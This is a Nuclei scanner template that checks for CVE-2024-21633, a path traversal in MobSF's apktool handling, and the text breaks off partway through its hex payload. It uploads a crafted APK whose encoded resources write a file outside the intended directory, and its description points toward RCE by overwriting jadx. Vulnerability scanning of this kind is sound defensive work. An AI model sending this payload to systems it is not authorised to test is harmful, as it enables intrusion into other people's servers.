nuclei-templates/http/vulnerabilities/mobsf/mobsf-apktool-lfi.yaml

id: mobsf-apktool-lfi

info:
  name: MobSF - Path Traversal
  author: Will Mccardell
  severity: high
  description: |
    MobSF is vulnerable to an issue with apktool (CVE-2024-21633) that allows for RCE or arbitrary file writing. It does this through a path traversal vulnerability. This template tests for it by writing to a local file and reading that file. RCE can be achieved by overwriting jadx, as shown in the two POCs listed as references. The payload for this template exists inside the binary format of an APK, which is a zip file. This means that a hardcoded random hex string is checked for, rather than a standard dynamic random string.    
  impact: |
    Successful exploitation of the RCE version of this vulnerability can lead to unauthorized access to the MobSF instance, which could leak private intellectual property or deny access to part of the application.    
  remediation: |
    To remediate this vulnerability, upgrade MobSF to at least version 3.9.7. This version includes the fix for CVE-2024-21633.    
  reference:
    - https://github.com/0x33c0unt/CVE-2024-21633/tree/main?tab=readme-ov-file
    - https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
    - https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/19c1b55c2c59596f2d43439926c9dc976cbeaec4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21633
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2024-21633
    cwe-id: CWE-22
    cpe: cpe:2.3:a:apktool:apktool:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    vendor: mobsf_project
    product: mobile-security-framework
    fofa-query: title="MobSF"
  tags: cve,cve2024,mobsf,intrusive,rce,lfi

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}        

      - |
        POST /upload/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBHBsnUK0pDAzKttf
        X-CSRFToken: {{csrf_token}}

        ------WebKitFormBoundaryBHBsnUK0pDAzKttf
        Content-Disposition: form-data; name="file"; filename="poc.apk"
        Content-Type: application/vnd.android.package-archive

        {{hex_decode('504b03040a00000800009badf658ef61a43018030000180300000e0000007265736f75726365732e6172736302000c00180300000100000001001c00480000000200000000000000000100002400000000000000000000000f0000000c0c66616b6561706b2d736c696d0012127265732f7261772f6861636b65642e7478740000022001c40200007f00000063006f006d002e006e00750063006c0065006900740065006d0070006c006100740065002e00660061006b006500610070006b005f0073006c0069006d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200100000000000060010000000000000000000001001c004000000002000000000000000000000024000000000000000000000010000000060073007400720069006e006700000003007200610077000000000001001c006c0000000200000000000000000100002400000000000000000000000b00000008086170705f6e616d650037372e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e4d6f6253462f646f776e6c6f6164732f6d6f6273662d6376652d323032342d3231363333000000000202100014000000010000000100000000000040010254006800000001000000010000005800000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800020000000000080000030000000002021000140000000200000001000000000000000102540068000000020000000100000058000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000010000000800000301000000504b03041400080808009badf658000000000000000000000000120000007265732f7261772f6861636b65642e7478740dcf370103410c00b03d68dc7d86e3ca1f421e800649765dbb2403506f5fd03e6ccac876cdc9979d75efbc041cacd5ccf76a986b9f288c79f2d139b11cf4f0739ed5db3531e1911add214e3c6a0a6ddf84c9ea52a24e21389ac0bcbed53272781d15308ad392abf970fc68136b2f2f1983404dc1059892dc55c8e7eed678c3476c5fd477e11eef8f0ba2414cbcd496423299b2a85bb7fefd01504b07081322908e9900000001010000504b03041400080808009badf65800000000000000000000000013000000416e64726f69644d616e69666573742e786d6c9593c16ed3401086ff8d13629a36a4a14845544242880382a4481c508f50718a3880c41148138746b143643bd05b7be039106f0047c4c3f000bc047cbbd934c62512acf57b67fff9776676c70e14eab02619ede976205dd36acc0a7613dc034fc11bf0117c02dfc00f5035d20138043df00a9c80efa05d91ee804720069f414db1fa3a52c42c6d29d15853bdd05013bd844d95c1bc83931a7aff07f384f710e6a2e7193113e76929c74ef59655be366e9fec31ab0f7a8c3d403377a76ea0b2d60c5fcafe4ccf79db4ab78971829d3a7dee32e644b475f4988fd05ad5809d09fbc7ec8ad6e4bffe0faae559a7e7270bf4401ded6355b01e32d7f14d51a568c7cc8b93d9ea63d6035fe122e74d9fb3c36a8e6df38ef147ae8ed86923bc23ac09968d33d16beab1b11222dcd5319a1cfe405d9e8c28c76e7f1fbb53aaa5e3f3757da42e9e085df742cda18b306535728adc9d6ce6fbd2779d9476cfab1cb9de24746eeeee6fb8e6e6fe67cfeafb095164ae8efbc0f6453a33a1bb772363362bc6dc007b6006cec097c0989f5563d29a3119906991dbeaa55f8c4de62bb66ff05f0bbc1d2dec1d9ebaffdf9ccefb433e67e3397e516db8fa146c782e2ce86e79eeb2fb0a16ba86f76ffbffd8724dcfb54b7bad7db5c0357dbd3d5fd7b2de1d5f6fa550af29ecdbf55cb5143ff077528e6573e48533dbb1e573540b39b48a473a736ab9da8a6bdbd97297fec2d50b9c0ab5947306a5be2dfb63d6f4f337504b070810fa89ae1b02000044050000504b03041400080808009badf658000000000000000000000000240000006b6f746c696e2f72616e6765732f72616e6765732e6b6f746c696e5f6275696c74696e73c554db72db4418d64ab2b45a9fb66ee238a74675a031a1842405ea86d324c1334e68a1938412669801d5dec49aca929194d36d67608617283c010fd02b5e006eb8e05df2001dfe5dad1537a4695acad433fabf3dfe87efffbc8aa2688aa22025f999e489458c0741ecb93e3142c7df651129ae769cf06e18ec862c8adcc027d66ad0ed393e1f6acbfe1129ee844177d50b22d6dee0570811373763278c89ce6f132c561a7e9be851cc7a445bf363926d059ec75a31388a085e8b59e8dcf718c944e2628ef9ed35bfe5ed45ee3e2ceeb86104de3c07acc17ed873bc88982b41e031c7279920ee3088d271a2ce6ad066c474a346b7171f11ec72b77110921c4f64ad3fc371b01987aebf4b0c8923a7ca4c8fe6765cdff11a1eeb3248da84185fb04348c5e716732b4ab4b84deacf34eedcddfa86640739c97dd9633e102067505ce3b05f1cf98cf542d67262d6266617c23b70e44fb4eaf876dc0983031b06ecb0c57a9c2afba0c37cdb8d6722dbedf602c81548b3e3c00eb9930872844bccde77bc3d661fb871c7e689d9f1518f5db77782103c39dd9e0713e1889f15cdb15d4e769b45f69de5edefee2ddffeaa3167aff130905ad085e2dbaccde3ec45cc9e196cce8cdd0b831e0be323f0e6c4763b60913f1327b9cf91ec2678669f27a232f7592844a42dccdd22c5af9da87108575dceade3916cd7091fb07015da1c91e1c1adcdb8edb9f7977b2ec1ad00165cd04c461409cc7b81cf12edb4f890a02d428448134515406d8302cec23c6d6ff9e9cd74dde49de532c56092aefdf1ca5ab2c6975e5b478ab7037f7790109d2f901cb769fd23a70e9dfc753831e282c56d42cdab532bf7f9fab829fdaa12952a44c70a45c4c088aa150550a59a4085ea124d89a4929ccec2cca439b95a1268d211391f1588e898c4298179e915d1ab12abf2fc1b126724ce4abc2ef15d898bf2de0d8123d29f49df93ebef4bbc29703c8d774be0645ad592bcf7a1dcff48e22702abfcdc98f6bb85aa37f14f5a0929156d45c5ea7a996616756ad454b05858aba6d5d131a2449dd7e10336e733f019d59f112e9710aaa8b6b684b49521ac94749aaf715b10d6aaa9eb797a097c5caee975adf9485d37e8505d6d96018761a1bc6ed2723d936c54ea46b3bca1d36253014b85b59aea31aa8a884609fa368f7964f82ca25790c887c097ad7e0fc1a186dc4a09e2166b082c1596e760d2897ef42b7504414c3ade54b71fea3098686adb0f0b3098e42b857e4c2a3d67faf1aa9392a602a7098ed94d20054b52f2d5bf51495354ad924fc8c8092a90a0020109ef0009733554d7791a7d4e32c9947362484e748195ba09592ed1e9fabd26dafe457f6ce5f0a512c66f96748c6bd7f8b404d39a98bef5d8a2f8722987df86a5dcba8eadf9a10d8b16c4dd473a0cf372788c66d306723ad17c51227d8a5243505ac63bbcde61c867beae34878e11dfd3ab5b7c5dad14674d50d9c2223a294febd723ea004e0b40ee6f9ce5bc181ca30a519b0bb295e584bbba22e8bd21e9ad3c53852a57614e123e2214f8a354e0c8b315a8a46c6b203cc9b622d956a502f5be02336728503946570429270a3ca16a5450f56da2beb133d48784fa64e40f52f5a1befad4befa505f7db2cad17f296fe22ce58d57ff92ca1b7f39e5a153ca33ce515efde59577addfb47395974d7570e5623a98846f2a7d89265f5007fa291d9cfb1229c94b3475a60e78a7ec412d5c7d9e163e7e012dd822eea016a6cfd242357d85aaffff2bf4e97f7b8526532acf7f85f6f12e7f6de8055e9be90bbf36cf4ffd1f504b0708ed8a3bcb0c050000470d0000504b03041400080808009badf658000000000000000000000000260000006b6f746c696e2f7265666c6563742f7265666c6563742e6b6f746c696e5f6275696c74696e736d54dd72d34614d64ab2bc3a719c8d314131840441a94929b55d1a54dad2262654b14bca3821935e743ac251128122b992cc4cee6086296fd04780995e72d527e01178843e40ae7bd1b3abb5f3433db33a3f7bf63b67bf73d68aa2688aa21025ff15e1df0218cfe22c0c2230db611cf9de93d0076d393a84429fdb504cfcddd0ef676076db5e188a7dd2033df20e7c3036b22488f6800651e627911782b51671571af4db719466abcfbd70e865411c81d16d875e9a02d984895c0d76033f81c9df875ec8d59d750e0969703008fd5c0fd23504f1a23ed6b112c7a1ef4550e0903e4c6c04e8eee6b5179ffb49ca9368cd5b4dacf4c130ea8ba474acb1eec361c6ab7f94c4033fc90e816c61e4d89a3ebbdf00e81eeb5aea67a03f8e82ece3c8e689c826d0c4effb0116f471600bc87d20ab27c25b608ec29bc72a7a477563e63dcc3cb69bc76a0b0addcdc3810fa697ec0d0ffc284b61a21f87bc5bb89d82fe53906630258230e1d3dc0fd03f269f05e9432f7986dc0f656fcb79b8976003b0a7600669cf17ed8189e1008b5e8987d14e0af4b99704a23366776bacb6e3838117f12cfac6e6328e09762f81d2a3e1933048f7fd9de5410093fd1867c4cbcf23a999b8433f1e39cc201aa9d0473c9cc2286b9ed05ba0f7e3c121183e1f9d140a71b68f95d27d2fdd6fc73b38bf388440b3584ea7be1a0d0fc05c5bdf5aeead2daf6f82bab60edacf8f372b7faaa032050caa3062e55245a9a3d4d1d258417aa9f49a68190c84576313524ecaa86929cf49ff8cb42f48db92b226e545292fc9b8cbd29e9772414a5bca4f645c5dca45293f93fb376595b7d0bac8be90de86945f4a7947c839e6c8d3df48f9404ad7526adadfa666cfd0dd0a512cd23198e6286ef588e8a03654fb26fd67816fe88b3cdc5820bd295674aebb64fbed2bfd9da9d2e211a13c1257c1fe4d44138b2e1631bad4224a678eb196ce2a75ddd1dcb72fc83bb344272a94562b3aa5f5f33dcacaaebafde6958eda54ae1d114b029aa05ba451400d84a6da73748f5763caf2cea0d9759e5f25aa551a957b44aaa0ba0618156c764397721281f24acb8b9cc4d92352c2b059b93d65df1b01b17cbf536673e36bbc7981b0974ec44f4b59c69a2aa03a8abd25ceab9a754e9c2fe197204a55a05ca9170496e1e839561db1f2fcc071709146556092634c5cc48e04aea65be705ee55817b0dbf2aa2d704faf5ba81df4feb4591833a853cc76dc4bf8aeb9ac8531ee5c1a53666442ef5742e5caa3d2f699a127cce723e4f12a5db4b23a2a647111dca6e8c48b24e922ae50541d07a7e4eb3aa9220831384a7cbec464ed1889c6ba73038519c2455d8962c54b177733cdd9a39458cc18941d4aa401d533322a571063b27a82cf135e19fe5448c1be0cbf750ebcdb2cff11da8f93b383dd4b3ac895bdaff6d51d672f57cca6b72cae764a72f891937f9b4dbbfe4737eb95764b7f1adbdd15129f2e7c195af38025796dc022a6216f373fc11e2aa0944adc1fdf367dfc8aff40f8d632faca854ed94d8b748c97775bc9b5b44ebde29ebfb63ab67b0af9d072ee995d95dfc8320db2fc5f3bf220642de0333db7f11fa9a72fcb905e72e71564a159d2dd5494500758aec07047bafa1b2eca85cb9c0565abc4b1823244fa7b9ef496792b531fb7d31081ff88155c7703ff03fa81f9da23bd3434057c5ef928b8dbc2e6ae0fccd8b6f4dd623ff3750b3393767b9b8435fbf54f97ccf73329eaa740d57075737bfd6bc9c8dab670efe07504b070881092a85f20400005c090000504b03041400080808009badf658000000000000000000000000280000006b6f746c696e2f696e7465726e616c2f696e7465726e616c2e6b6f746c696e5f6275696c74696e737d4fcb4edb40141d3f32b9be797418681ab1e8222b560856646b8c5143d5c49a18a4ac901b2660e18e2b67a062c9aff00959f15dfd82daf1a4a914a9b339f79c7bce195d42884308b148fd9af866237dcc75962af4822c5732f99e49747cf5828d79c51152a565a1920cfb23a58b542dd37990aba50e9f93ec29d169ae107da5726de6643bd33829eea5c66e9265f92f7957d325b2addf385ac1643c8dc575104f04c2e5f538884793314224265128e2197a426aa9d6ad8dea6389fbdb92ed8e9e8fc6be98616b9aaab9fc5a5fd67c96c5b2da3aa7c767b81765895ee4c58f0bf953aabb32889de8a99042a68b747d7e379e45e16de40bff5b1887823fa0cd085220ccead76897e896e896cc610da352a3364b4619ac55cad060d720336ebe46877d34d8eb9343e7dd73063d58708bf4ad2bca9c21f972f0db72d13eb10737f06a570bf79cd45263e50da0c93f83c70fa17d45014f60d832b8e19d95d72d0d081f7825e0706fe5b5a1c501f6b90b7074303833bded7f7a79d95bc7363ded9d9ebfc1ce7f839f76827f00504b07080d33d2d88a01000086020000504b03041400080808009badf6580000000000000000000000002c0000006b6f746c696e2f616e6e6f746174696f6e2f616e6e6f746174696f6e2e6b6f746c696e5f6275696c74696e738590cd4edb4010c777d71f594f42620ca529fda2a1aa72aac28debc618626aec68ed2038456ed8a2d0e054c1a1e2d84bfb167d084e7dae3c41d778497a40aaa59f66e7e33fe31984908610c2a8fc2af05b03f3eb349f8c338034cba6799a8fa7196cb0e59b8b5c640f41ddcbe6d760c6d180bb1e985d3f64fc1c2a7c1026fe8907f64a93a4b34b9183e1062c8e65220ca384257e140ecb483d39ef7bc33ee3ecc44b3c0eb4cfa3bec79373300e7d2f38807a10b92c189e32eeb36ee041e39405837f1555370ae3840fdc2492f2c341e816eda1f1d86878e42545dd2a109701bd180de09df5b917c785463ff4e504ab88b3c0673154e37136129fcaab546ec5eca6d85edbfbb807963b996622fd3c11a0b1ec0e8c51e1837d32bfc9bbe2603a9a5fcb63890b80d531c054e7a8a793c9f4bbb828dd1b002ebe89347fe866adce6cdca693b90083cd66e99d7305c446a05364633029b64913498b6cedc162bba2fce7ca6e2bfb52e55f2bff8df2df2afb4ed996cabf6fa26ded8f855b6dfaf30771306e922ea1e48a505d6248cc05ae01e910301df9131dad75f958a9ab4a2ab12420a94a6a9235495dd290d892758923d9906c4a9e5dadd3ad7bab460d87d2a6a353da7e510ed29783b6e81707a3a6796cdaaff6516f73817599afb43ed05fa448d02e2a43d6bde55070ea74c7015a3b362974f47d6b5957fd4fddbeaaab75a9635262efb631d7eddd1e5e605aa88aed9f561e2925144a7ba74d3a8572a74716d8514a1da8dc0e377167edc91ef7963ce05f504b07084670788e31020000a0030000504b03041400080808009badf6580000000000000000000000001d0000006b6f746c696e2f6b6f746c696e2e6b6f746c696e5f6275696c74696e73dd5b6b741bc775c6ec621f1880e40a124988b1250871285ab24998f4039263d300090aa0489006405b769a2a4b6029c206011a58d8629c5876d34a79d46dfab25ba7efa66e9bf4912a69eb3a69ebf4913ed39ed31ffddddffd931cfdea2fab7766671f000624e088e96979ce6266eedeb973e7ce9df9eecc2c7d3e9fe8f3f990cffa53f0fb63587ebe6e562b358c93b55addd4cd4abd86c5646d0fcbc60b2dbddac44aaa5eaf1a7a0d4b7573db6860755b6f6e2fd4cb0616b33513ab66bd60362ab52b5866a9946c34f43d8c8ad8dfac7cd2c0fe4aad62e2c052ab5622d21fc0e215c3c452a55636ae62b5621a0dddac3770b054af560dcad2c46ad6268b4d60f66f1011d28b7ab565e0c0427d6757af114583854aad645cb47aa0bc68349a54fd07a6e730a65c0d7db30a8aeab532b454039935bd8a23a03768daac9416a02d334dc45a1d0f946825a358c72258030b4481abf0136246b0ba36c24a8e92fed49e098aad262f5d7e2ab9b291866c3667670bd967d39753d96201632bfb4c315dc072aeb5b309e69417eb2da2a3b454adebd0d3953a316161bbde30b158364af05379118bd04f2ced546aad26f6ef56e15769e8b52b4451996688c96a669e647180c8b0b298bedca899952a31cb393cf2b4de4c5fdd351a951da3668231823b7ae379a3b150d59b4d3cea7d5530cbd5ca6672b782c586b143aa3f8025135e36b16cd6698f215dd8d6a1fff4172f1abb0da3a49b46192bc0d6d4418367172b4033a3a57a8d8d4fd4ac47097fb4d28c969d1ad3d18da601afa01753f74e5b72a7ee8dd61b166f898c54a355026b4761e84c432f4fe360c3d8adea25e3e98ab98d83794f41a9ecec82059b181b57a18526f58b5173bbd29cee6c028fba6a7bdd29f492dea8813f531ae9fd4320acd1a8371861169c0c9c9f0d9f62d6ad0194a87c62193a9240b7c612b76a7a636f958e6080e6d7c93006881d2daf0a91ace35261e24c99ec85cce5c2463ebf7621594ce32384b6b2f6b4873444486e314cfcaeab16d03a6b01c92d0688252c87b9b8e08e537dcbb23d8c97e5acbc11231cd325580ea2bb8d3a388fb9e78e4f981a9cbc9cb61c06ac7dcc4bb38c07d4a35e2a352410030eb15d12316c671d6a645287e8c3ec49b28e3d69a9006b9a41464fae1ab52bc4699aad4d87889ba6de30b3d6ba64d4ca562eb050add70cba8e482592c5c7c146a671d5b457b4e2deaeb10e4bcd4e1338ea2d187dacbb8ba95cd41b64c11bd6abd5fa4b46d92a36b1e62eb88cc35f7c663d8db5d556d34c198bf5528bcc43984be07b8f60a96abc6854b1663b2b545ba114696125592860756923b750ccaee5b0ba9e5f5b4fe78bcf4013b9dc5a3149a8972daee0c25aae50cc6f2c14d7f278c466bc5c48178b692fe1824508108d922bd924d4dcae94cb46cd990d0f627fbad6dac1cad3c97c2e9bbb80a534b8531ecb99ece2623a878fe4d2e05bd9a7d297b3b9a56c2e0bea88391de8eb6b856c3bfdd98d5a0996d386678d988e16eb51bdb45d812e460176a24d7dc788c2446e55eda5c4247e09532d0a33bc5a2955ccea5e14d679c24d9718e26fd35873a73b73c08f1d4a6bd4ffa6f111b739db238396935b3e396c151caf0c2c36abab7401c681bc61c278139739eaba864b9453d95c32ff0c4669ecaf817e58a937ca1582674379f06058659b6bbbe0bd58627eb1944daf2ce2e195b585e40a60513e9b4cada4f10845a5cbebc97c72354dc6f878db9adfda2c1124b024c130270826800ac44c5e7fc798ce52ab574334ef744ab51931ca13e402f86a6e57b1ba593117e8f4802260468bfc12d4b2840421e7da85cc71368d49d679a1e4200a2151c6b784430496ec5674afde8ad64170a35226b559ad2dd63360251c0d6761ac4168540119f7452be6e926f80e441260d2b251265a5d69e86508a6c0671cbda89fb106a03fae64c7ab0074e13dc89bc605c3886e9be66ef3fccc0c346b36f4d2f3d3cf19e66643079d610ddc99a9349b2d63e662f1fe071f7ef0e187a25bd09db261ea956a33aa6f4215dade4e0534a123235923ac348c2d127461f9a21501e0f4a5f57cba50200b897f290b0e2317d636f20b8019748903776ce488f785d6c1912bcd6da34c22044cbd9d7903cd3b2336dae653cc55211c2bb476293263897873130f93b5c6e39781e276a3fe125b77f556d3c0c31bb5a6be653ca5372a3a5985149db4b7b605aab51a46dea86c5528bb6a540de2ce4d1c621cb9561522d9e14d4f1007d5829b36f69242c9060e22b0ecce5928626367d7dc636e6ac0aaf7140944e90bbb006d6d391382bca9d49c7cb06a3b3314424dc7526b5be177242c683e2cab3e0d45ac5460a99fa50a4b032cc52c1d86d40f69184aaa76945147692a6ae3ac1c61e98718f7dd501ad64e30ea8769aa6af7b0f247681a766a9f61e95996dec7d2fb593acda43e04a5e3dac3947a5c7b84bd3dcfd28fb234c5d205965e60e945963ecdb4b944d3134c8be3da65f6fe0a7bbfcdca1596d658bacbb481a05a3dab3529f5acd662e94b8ceb93902a90fe8465f051da0c217c11d18caafd0c62949fb53267b59fb3333f6f558a3b957ec97a93d0deb22bfdaa9df9758b77cce1fd0dbb81dfb4597ecb62f13b2c5fb159be6abd1977defcbefde60fecca7f6867be46321264fe184139a3ddb45ffca99df9334b5ac491f68e2dedcfad3792f3e65dbbce37edcc5fda99f7acccb0f6d79099f8a6387142fb368a05e14d30826e0604b538ab687f83a684b82f8132d7d58988f6b71deffd5a684a4af82786b5bf4316b31c57123294bfc3ca6a3c9050a1fcf7ac8ce3c10486f23fb072283e94084d8c6affd82ed96af05eed9f502c609167d1f0aca4bd89a64612becc0df56620a486c2aa7a3cec57d5a9c72762da3f7b59a17e37cfb0f62fac552d7e24a141f9bbac1c8e4b893094ff95958fc68f258e42f9df5879343e96189d18d1e6a0c7d2542431f2c478e6ba30216b2a6423b7d0a7b0900962390c933d2e6315da4334e78f204617a124c4fdf068f088f0c4e009c33309cf097866e1196532e29087a524fe183c63f024e15984671c9e557822443270905fe19d802f36ac6e85912f826e21d284103baf8e4584946f794813a9ca088cf686b02c6b7242c88c2d13c5c5ccd82d14a6ca50314c3d29d62292e43364ea0553c3ea58988c3282dfa12911048e80400d040a608165453b92f093cc51ed984587dfb129212101310f1533a0d23d44254b7cc28731f410c123c415da5b211e80773816536f88a4e5604a5005d68ff6119c887d0585118a88d1f1f3689cb02d87b5bb68ff7cc429fcc47546807692d184cc9b824db3ec20029f4d0b695152cbe138d525290866f267c66d865827c32d3441ed670dda10eda26d4b29d624bdd13a2d9892add207b264d4b52434ebb5a4103f42ad784dbd4ead789498273fa24d66d0a5ebc57703643d791f01e1b487701be54f6a530939235cba51ecb0f5bb013fe08e060cf7eec7002315624a115ff2c7fe0bb4f20991b0778c4e321f143de361d1fc40bbd1419338349143933934c54353b419b28c1005e28e026e853853c0df4593c0e69d3491535706c374d294363ecbe96005743aae680fd84acd72949ae52835cb516a96a3d42c47a9598e52739c76e738edce71da9de3b43bc76977aeabdd21ed41d62e26ddb78b627b514e04bd45c57a3ba3259cba373a16857337039a7a5738a43e0aa4d0b25f0dc4ef762a88835620ed0f5441e9b78553da636d766f8326cb44368b3d0cfbb0d8a3b20f8b787043f698edc3a2f49612d6e6399e34cff1a4798e27cd733c699ee349f35d9e14d49e8029c456e527b56422440a67d493a0e02255301dbe4b5d0a47d460ea981a0dcb6a262c50f5b3f4edf2cdc0987a0a8a2bb4b80ab91ccdadd9f2d7dd553fa83d096a3b853ce8e1140aa0a853282614b7a02686ec4248dbf0e81ed29e724bb7d0e3b0641ea34b278110c42084c40116ee8f53acf74234019c0fb18881414cecd02026dc01311fa610f3bac030e61e8a319af60c83145945dafbdf9381f2ac97729b503ed64139a54d82f5100f562c16052afd88a7d2abff49c47cdc4bf93ea1fc6807cf49ed742fc1109569be83102f7a10e2f95dc43b4111efbb12094a4e74039e37002160e4b3d67dd1413e2f28f8bca0406a762ee2425bb032d745b3d74c1f1d4e6781f271560aee027501a6959c51da67d227f69d493a11eb9949b6fb27412dc52a5c80c9a40c2675932bf5024c44753041a51e82f260dd8104957b082a24028309327a082a028a0c2468ab87e555c0af71b6b83c4c3dd41b9b7a17928fb088ad73a9618bcae4a12d2a273a1695d3745159b23630536de2df2633e2792856a9d41d0a359379457b0e26f8db3011b536b9427c2a3666c9b917b63875f0c263f686e87e8b3e74869c1904a3646774924d2104edb8739a6e5262cbea0d81f09fa1dd7e610a414f5e203d51810511b69b81b07a5f785835c318a690ace2f8fd891789e5a7dbe7dad5d85b88093b9922165d048bcaaaa02d4d0934dd9b1241f85e86fc2e6648434b19c1ea1a62db4062be999b815568300b0da69d065f66e9a758fa6996bec2d26bcb0a4d5f452cf39a9df931bacf9e8ebd6d2b772a759caab3c2d4cb41aa40fa19443b9f03cd2428500557bc96900e45b19b81213062008c2881117f1cc5ceaad75f13c8423b43d6d8e744f53a829f1be4e7b3c81abe197bf71cfb0fc420ea010a51a3ce3628a8caa76ed3bfef5d03f2690fd9be46cf8f699f431eba45fdfe6da07fbe9bfedfd780fe050eff3580381768da3b43765fa2f62aca473d50d3c942b75fae5f8e52acb915a0bbabd16eb0e1eda4783bae43db5df9c9994bc76e08716812872672683287a6b4d1fad85db52b35cb516a96a3d42c47a9598e52b31ca5e638edce71da9de3b43bc769778ed3ee5c57bbeed6011d14d1a38359a48359c48359e4835994de2cee4ec2dbf3798e25e739969ce758729e63c9f92e4b16200ca2d1ff7d00c6010063321f7f1285ef06343e0e683cea41e300a03179fd3a6adf524c385b8a55779782effc2e050db84b29d8bb146fdf7e6affbefdf4417df3061d74b7e3da92ec769c9215901c734e39dddd4eb8e76ec7b3cb993db48064b4232099a301c90ac3c507533e2b86403cc47fe56660447d281c04d5087c3d9cf8051bbeda5c3a7694e1d1239ec3cdd897913a194642241e1d3fa34258f2069a4588acebc3617ad22d42f28b68ca4f631929e3776216d9eaa07db8abc2a042d1af01dd3edacd8f80041879f1123babcc135919889966b09879033907cd6e7c28317b08f498d61986d837ec10e16e8f2946d404f47a8ff6fa5ce206e2d9611bcc5506737da22b2c78c5090b2cd0ff928dfebf6c677e053991821d4974040aaf76450ced67c519a6f5f97d07f0659ee25e28fe35127a58921edd579215fcc5be6d871e1fa5a1c71127f45054e9eedbb7af5d03d2690f89841df9b01b72109acff7ea6da07dbe9df6de35a07da183ef1ac410bdc30c12433c716094a1ba51c69837ca18eb2fcae04514bcc8e3d0a20cde792d2ff2f8a14619bcf35a5ee471a7a30cde792d2ff238e428a38f03ca3e0291ffd52883775ec98b3cfebf47199237ca40ff67a28c314e94317a5094f1d8a14519631d51c6e334ca18b78e25e6cf900bf92fa3a87381fb9a0d234f5018093b30a2c282fd3eec5f478076da43bb4d69d6e1668fd34f8205d6e1664f06d5dad753a5635f0b5218f0775fb7d269d071ddda3e0d4e72a6950d17dd3422af132e640e9f770a7541036f79eff77a8f0717fcebbd3ea121a4fd3691a91cbcd8f77bd9c7030ffe659f97ef1467bc7a0340bf17803c40e15f00ba7c3d6efcd020178003dfe70d7c6378f817807d60da9db900ec035ffbba00ec29e598f6369a95b4df416dfe754cfb5d0e753fb0ecf7b29007befccb42978f5c167a608a5d16dad0d6fb9a0f7d806bbe1e900416f93dae45629d73d3bd10f47bc08b774adfeb42b04e2023d901620207c4900d62623788218a6c3688dde580980d608802588a02d8176d9c5aa03835eee0d490eaa73845ff10bc38ed7971db7d11ed7d1dc70e490fb88ff39c918e5bbb170bb6c6fb83ad7e7734bc9d0a6f47c3dbf9dc911d0d0f8e7890c783b21f10b6fadddff0e08807793c28eb17b6faddf3f0e08807793c28e3c1967fdfef563a50ac03b6fc87feddcac03837306cdd993d5f1f80d3073ef6816c7dc196c8852d91035bfdee0f7970c4833c1e9475c296034e645f173ce47d9ddc735f877a825f6830f06bb72b07fcce33f01befb1731beb02bf8e2f61160f6df736deb17b4b53f093234b045f625fa507b9bec8b1946f59a65f274d2eafc2a009c440673dbbe03f42838cda3977d440ec3ab9fb86f449d09ca4795096a4243c2129199c4957eb30338d6d38bf1d3dc4deb3cf732fa4d4b0ac3d3a25c4c9a5eea3e4d639422f75ed0f98b32c87e2f2cd4045bd2f6ca86658ef3acdfdf40f7078fb753bf30def716efb91ec9fa0ceb35dfb707e39a55847e5e472fa4dd4712ddddf05fde3b1329376d173be7b06ea4e42dd58576faf755e6df77905f071d64a34350c4e9925d7ec5a86d93e4bafd5336404c2cebdbfc7f618b491411b70961eadc526edfbf173edf7e3567474ceb91aaf333512e785b7504aa377fdf627097b53c4f9f732e47731c3aada1f219cebfbfea37dac9c938c15f6b9d8a4f3c5960011a20894d31eca6da0dcc14fb422d8f35172e4831f68f71bfe290784849cf0affbc3e2fec3bfeeba0a2c03dd21e1801f25b72b3568c0d75db75d29de87cf739c76070deebaebb6b7dbfde1737fc19dd27e26817ed8c19d32e89944dfd1a01bdc1df8adf09d0aee0e6cc81eb37de3bf033f4a6ef7a44103b6eebaed9ed4fde17357c076081f25f719b029de800df53cad38f0a3e4c83e61d8f83e671034145b3db4502cd2118ae56828f6393ba809d1868ed38fd68e77040439c0af65c0afa59e21cc9706bb76e643b17dd9bfe6bdecff3a688c84886441906fd9fd4858ecfa2f25092ce2d22c738930e26f762d8dde4f82ad0f2589841de026ffe645c6dcc7c63c3fac3d9718cb8897deb4c3ed180576f7fe7f0a777e237a225662565da7567d74ca0a14c1aac3ed81e207bc5a279a9c8ffdbb3d764fa6026145fb16a2519104999e01d1eb089afb2c82f63e83385f175823f417e8ce7c66c062c78122d6d80614a04bf994aab2af3e5301c849da5f41f7c031c65243169991f22a2410d2bce1cf2b24f8828cfd7dabfbbf7ef9d849f53bd454984631e4630f44fe8fcfbeb491628f315b160efa58a13bc626befbb2fa1aad7ed7407b83396860061a38cb99587cfbf266cfff00504b0708dd897ff784140000d0480000504b03041400080808009badf6580000000000000000000000002c0000006b6f746c696e2f636f726f7574696e65732f636f726f7574696e65732e6b6f746c696e5f6275696c74696e733d8a4d0ac2301046273f8dedac4211295df604821bb75a10d18d0b3d400da9868604fab3f0669ecb13188d389bc7bcf70100030002f166d8a2e8fc688dc3acb6dee9e66a35b28d7b60a23e3faeee8deace7ee77ba58fdfe5763276346e082a8adaf77e0a460fa7b06d6e1af9c5991151fd435e2195802205498a48fa6312c80345999742f235ece98b70a44bf6cc78b548db9c40410e42b290e631d137504b070843e19fc69d000000c8000000504b03041400080808009badf6580000000000000000000000002e0000006b6f746c696e2f636f6c6c656374696f6e732f636f6c6c656374696f6e732e6b6f746c696e5f6275696c74696e73bd56dd76d34610d64ab224af65a2d881284088718831a1a506da2202a5253fd4f9015202296de98f4814f04191524b4e491fa0d7bdec13f0005cf112dcf6f4317afc049ddd1dfd851c4e2f7a9a73a2d96fe7dbd5cc37334a24495224492292f8d1e95b9d6a2fc2d8ef05b4b215fabeb715f7c220a223f361e87b6eb01c7b7d370efbd448573abaa81a782f635a61cf64cb9c3f88bd94a9324